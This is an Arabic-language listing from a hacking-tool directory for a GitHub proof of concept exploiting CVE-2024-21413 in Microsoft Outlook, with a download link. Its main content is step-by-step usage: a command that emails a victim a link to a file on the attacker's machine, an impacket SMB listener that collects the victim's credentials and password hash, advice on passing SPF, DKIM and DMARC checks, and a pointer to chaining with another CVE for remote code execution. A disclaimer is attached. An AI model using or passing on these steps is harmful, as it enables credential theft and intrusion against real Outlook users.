Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21413-POC — ثغرة كشف المعلومات في Microsoft Outlook (تسريب هاش كلمة المرور) - CVE-2024-21413 POC | Kitploit
أدوات/GitHubGitHub/r00tb1t/cve-2024-21413-poc
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالتعلم والتعليمأمان البريد الإلكتروني
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

ثغرة كشف المعلومات في Microsoft Outlook (تسريب هاش كلمة المرور) - CVE-2024-21413 POC

عرض المستودع
172منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21413 - POC

الاستخدام:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : هو ملف الاختبار المشترك (ملف Word في هذه الحالة) من جهاز المهاجم (xx.xx.xx.xx).

لضمان الامتثال لـ SPF وDKIM وDMARC، استخدم $IP ونطاقًا شرعيين

تأكد من تثبيت مكتبة pexpect إذا لم تكن قمت بذلك بالفعل باستخدام pip install pexpect.

نصائح لتنفيذ POC:

  • قم بتشغيل مستمع SMB impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • قم بتشغيل POC

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • انقر على الرابط في البريد المستلم، وفجأة ستحصل على بيانات الدخول والهاش في المستمع
  • اربط هذا CVE مع CVE-2023-21716 للحصول على RCE !!!
  • شكرًا و تفاصيل حول CVE-2024-21413 .
  • الحل البديل/الإصلاح:

[!CAUTION] ⚠️ إخلاء مسؤولية: هام: هذا السكربت مقدم للأغراض التعليمية والاختبار الأخلاقي والاستخدام القانوني فقط. لا تستخدمه على أي نظام أو شبكة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر والشبكات غير قانوني، والمستخدمون الذين يُضبطون وهم يقومون بأنشطة غير مصرح بها يخضعون لإجراءات قانونية. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا السكربت..

تنزيل الأداة